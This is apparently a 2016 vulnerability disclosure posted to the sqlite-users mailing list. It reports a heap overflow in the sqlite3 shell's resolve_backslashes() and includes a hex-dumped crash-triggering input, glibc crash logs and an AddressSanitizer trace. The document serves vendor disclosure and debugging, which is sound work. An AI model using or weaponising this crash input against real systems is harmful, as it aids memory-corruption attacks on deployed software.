Dear Sqlite team, I hope this email finds you well.
I'd like to report a heap overflow, please find an advisory attached to this email. Best regards, j-
--------------------------------------------------------------------------- * * * Sqlite3 heap overflow vulnerability * * * --------------------------------------------------------------------------- --[ Vulnerability summary: Date reported to vendor: 27 May 2016 CVE : Not yet Class: Heap overflow --[ Synopsis: A heap overflow has been identified in sqlite3. Version tested : 3.8.9 2015-03-23 21:32:50 0ee2d38deb35aefc55395e86984a9a773caf6218 --[ Vulnerability details: The resolve_backslashes() function is subject to a heap corruption vulnerability when parsing an allocated looking for a back slash. The application starts by reading the corresponding value (possibly after the end of a valid heap chunk), and then repaces it, potentially leading to a heap corruption. --[ Exploitability: The vulnerability can consistently be triggered using the PoC reproduced below. Successfull exploitation is heap allocator dependant. --[ Timeline: 27 May 2016 : Vulnerability reported to vendor. --[ PoC: jbrossard@jbrossard-wsl3:~$ xxd /tmp/poc1/poc1.txt 0000000: 2e20 696e 0a2e 6920 697b 0a2e 696e 0a2e . in..i i{..in.. 0000010: 2078 1445 434c 5372 7328 aa6f 0000 036e x.ECLSrs(.o...n 0000020: 0a2e 2078 1445 434c 5372 5c .. x.ECLSr\ jbrossard@jbrossard-wsl3:~$ jbrossard@jbrossard-wsl3:~/lab/fuzzing/results/sqlite_0days$ sqlite3 < /tmp/poc/poc1.txt Error: unknown command or invalid arguments: "xECLSrs(�o.". Enter ".help" for help *** glibc detected *** sqlite3: free(): invalid next size (fast): 0x000000000104bd50 *** ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x7db26)[0x7f5e8bc0eb26] sqlite3[0x40528a] sqlite3[0x402709] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xed)[0x7f5e8bbb276d] sqlite3[0x40299d] ======= Memory map: ======== 00400000-0040b000 r-xp 00000000 fc:01 1708692 /usr/bin/sqlite3 0060a000-0060b000 r--p 0000a000 fc:01 1708692 /usr/bin/sqlite3 0060b000-0060c000 rw-p 0000b000 fc:01 1708692 /usr/bin/sqlite3 01033000-01054000 rw-p 00000000 00:00 0 [heap] 7f5e8acd0000-7f5e8ace6000 r-xp 00000000 fc:01 2493899 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f5e8ace6000-7f5e8aee5000 ---p 00016000 fc:01 2493899 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f5e8aee5000-7f5e8aee6000 r--p 00015000 fc:01 2493899 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f5e8aee6000-7f5e8aee7000 rw-p 00016000 fc:01 2493899 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f5e8aee7000-7f5e8aefe000 r-xp 00000000 fc:01 2504371 /lib/x86_64-linux-gnu/libnsl-2.15.so 7f5e8aefe000-7f5e8b0fd000 ---p 00017000 fc:01 2504371 /lib/x86_64-linux-gnu/libnsl-2.15.so 7f5e8b0fd000-7f5e8b0fe000 r--p 00016000 fc:01 2504371 /lib/x86_64-linux-gnu/libnsl-2.15.so 7f5e8b0fe000-7f5e8b0ff000 rw-p 00017000 fc:01 2504371 /lib/x86_64-linux-gnu/libnsl-2.15.so 7f5e8b0ff000-7f5e8b101000 rw-p 00000000 00:00 0 7f5e8b101000-7f5e8b119000 r-xp 00000000 fc:01 2498365 /lib/x86_64-linux-gnu/libresolv-2.15.so 7f5e8b119000-7f5e8b319000 ---p 00018000 fc:01 2498365 /lib/x86_64-linux-gnu/libresolv-2.15.so 7f5e8b319000-7f5e8b31a000 r--p 00018000 fc:01 2498365 /lib/x86_64-linux-gnu/libresolv-2.15.so 7f5e8b31a000-7f5e8b31b000 rw-p 00019000 fc:01 2498365 /lib/x86_64-linux-gnu/libresolv-2.15.so 7f5e8b31b000-7f5e8b31d000 rw-p 00000000 00:00 0 7f5e8b31d000-7f5e8b348000 r-xp 00000000 fc:01 2494807 /lib/libnss_centrifydc.so.2 7f5e8b348000-7f5e8b547000 ---p 0002b000 fc:01 2494807 /lib/libnss_centrifydc.so.2 7f5e8b547000-7f5e8b549000 rw-p 0002a000 fc:01 2494807 /lib/libnss_centrifydc.so.2 7f5e8b549000-7f5e8b56b000 r-xp 00000000 fc:01 2490475 /lib/x86_64-linux-gnu/libtinfo.so.5.9 7f5e8b56b000-7f5e8b76b000 ---p 00022000 fc:01 2490475 /lib/x86_64-linux-gnu/libtinfo.so.5.9 7f5e8b76b000-7f5e8b76f000 r--p 00022000 fc:01 2490475 /lib/x86_64-linux-gnu/libtinfo.so.5.9 7f5e8b76f000-7f5e8b770000 rw-p 00026000 fc:01 2490475 /lib/x86_64-linux-gnu/libtinfo.so.5.9 7f5e8b770000-7f5e8b772000 r-xp 00000000 fc:01 2493944 /lib/x86_64-linux-gnu/libdl-2.15.so 7f5e8b772000-7f5e8b972000 ---p 00002000 fc:01 2493944 /lib/x86_64-linux-gnu/libdl-2.15.so 7f5e8b972000-7f5e8b973000 r--p 00002000 fc:01 2493944 /lib/x86_64-linux-gnu/libdl-2.15.so 7f5e8b973000-7f5e8b974000 rw-p 00003000 fc:01 2493944 /lib/x86_64-linux-gnu/libdl-2.15.so 7f5e8b974000-7f5e8b98c000 r-xp 00000000 fc:01 2504418 /lib/x86_64-linux-gnu/libpthread-2.15.so 7f5e8b98c000-7f5e8bb8b000 ---p 00018000 fc:01 2504418 /lib/x86_64-linux-gnu/libpthread-2.15.so 7f5e8bb8b000-7f5e8bb8c000 r--p 00017000 fc:01 2504418 /lib/x86_64-linux-gnu/libpthread-2.15.so 7f5e8bb8c000-7f5e8bb8d000 rw-p 00018000 fc:01 2504418 /lib/x86_64-linux-gnu/libpthread-2.15.so 7f5e8bb8d000-7f5e8bb91000 rw-p 00000000 00:00 0 7f5e8bb91000-7f5e8bd45000 r-xp 00000000 fc:01 2498744 /lib/x86_64-linux-gnu/libc-2.15.so 7f5e8bd45000-7f5e8bf44000 ---p 001b4000 fc:01 2498744 /lib/x86_64-linux-gnu/libc-2.15.so 7f5e8bf44000-7f5e8bf48000 r--p 001b3000 fc:01 2498744 /lib/x86_64-linux-gnu/libc-2.15.so 7f5e8bf48000-7f5e8bf4a000 rw-p 001b7000 fc:01 2498744 /lib/x86_64-linux-gnu/libc-2.15.so 7f5e8bf4a000-7f5e8bf4f000 rw-p 00000000 00:00 0 7f5e8bf4f000-7f5e8bf88000 r-xp 00000000 fc:01 2490611 /lib/x86_64-linux-gnu/libreadline.so.6.2 7f5e8bf88000-7f5e8c188000 ---p 00039000 fc:01 2490611 /lib/x86_64-linux-gnu/libreadline.so.6.2 7f5e8c188000-7f5e8c18a000 r--p 00039000 fc:01 2490611 /lib/x86_64-linux-gnu/libreadline.so.6.2 7f5e8c18a000-7f5e8c190000 rw-p 0003b000 fc:01 2490611 /lib/x86_64-linux-gnu/libreadline.so.6.2 7f5e8c190000-7f5e8c191000 rw-p 00000000 00:00 0 7f5e8c191000-7f5e8c22f000 r-xp 00000000 fc:01 1710926 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6 7f5e8c22f000-7f5e8c42f000 ---p 0009e000 fc:01 1710926 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6 7f5e8c42f000-7f5e8c431000 r--p 0009e000 fc:01 1710926 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6 7f5e8c431000-7f5e8c433000 rw-p 000a0000 fc:01 1710926 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6 7f5e8c433000-7f5e8c434000 rw-p 00000000 00:00 0 7f5e8c434000-7f5e8c456000 r-xp 00000000 fc:01 2508685 /lib/x86_64-linux-gnu/ld-2.15.so 7f5e8c629000-7f5e8c62e000 rw-p 00000000 00:00 0 7f5e8c652000-7f5e8c656000 rw-p 00000000 00:00 0 7f5e8c656000-7f5e8c657000 r--p 00022000 fc:01 2508685 /lib/x86_64-linux-gnu/ld-2.15.so 7f5e8c657000-7f5e8c659000 rw-p 00023000 fc:01 2508685 /lib/x86_64-linux-gnu/ld-2.15.so 7ffebc726000-7ffebc747000 rw-p 00000000 00:00 0 [stack] 7ffebc761000-7ffebc763000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] Aborted (core dumped) jbrossard@jbrossard-wsl3:~/lab/fuzzing/results/sqlite_0days$ /home/jbrossard/lab/fuzzing/sqlite3/bin/sqlite3_afl32_asan < /tmp/poc/poc1.txt Usage: .import FILE TABLE ================================================================= ==2443==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf30032ec at pc 0x806573c bp 0xffdd5d58 sp 0xffdd5d4c READ of size 1 at 0xf30032ec thread T0 #0 0x806573b in resolve_backslashes /home/jbrossard/lab/sqlite3/build/../src/shell.c:1946 #1 0x8083183 in do_meta_command /home/jbrossard/lab/sqlite3/build/../src/shell.c:2614 #2 0x80967a8 in process_input /home/jbrossard/lab/sqlite3/build/../src/shell.c:4077 #3 0x8062f98 in main /home/jbrossard/lab/sqlite3/build/../src/shell.c:4694 #4 0xf70b74d2 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x194d2) #5 0x8065148 (/home/jbrossard/lab/fuzzing/sqlite3/bin/sqlite3_afl32_asan+0x8065148) 0xf30032ec is located 0 bytes to the right of 300-byte region [0xf30031c0,0xf30032ec) allocated by thread T0 here: #0 0xf72b7654 in __interceptor_realloc ../../../../../libsanitizer/asan/asan_malloc_linux.cc:93 #1 0x806c16b in local_getline /home/jbrossard/lab/sqlite3/build/../src/shell.c:451 #2 0x8095a7c in one_input_line /home/jbrossard/lab/sqlite3/build/../src/shell.c:491 #3 0x8095a7c in process_input /home/jbrossard/lab/sqlite3/build/../src/shell.c:4060 #4 0x8062f98 in main /home/jbrossard/lab/sqlite3/build/../src/shell.c:4694 #5 0xf70b74d2 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x194d2) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/jbrossard/lab/sqlite3/build/../src/shell.c:1946 resolve_backslashes Shadow bytes around the buggy address: 0x3e600600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e600610: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e600620: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3e600630: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x3e600640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x3e600650: 00 00 00 00 00 00 00 00 00 00 00 00 00[04]fa fa 0x3e600660: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x3e600670: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x3e600680: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa 0x3e600690: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x3e6006a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc ASan internal: fe ==2443==ABORTING jbrossard@jbrossard-wsl3:~/lab/fuzzing/results/sqlite_0days$
_______________________________________________ sqlite-users mailing list sqlite-users@mailinglists.sqlite.org http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users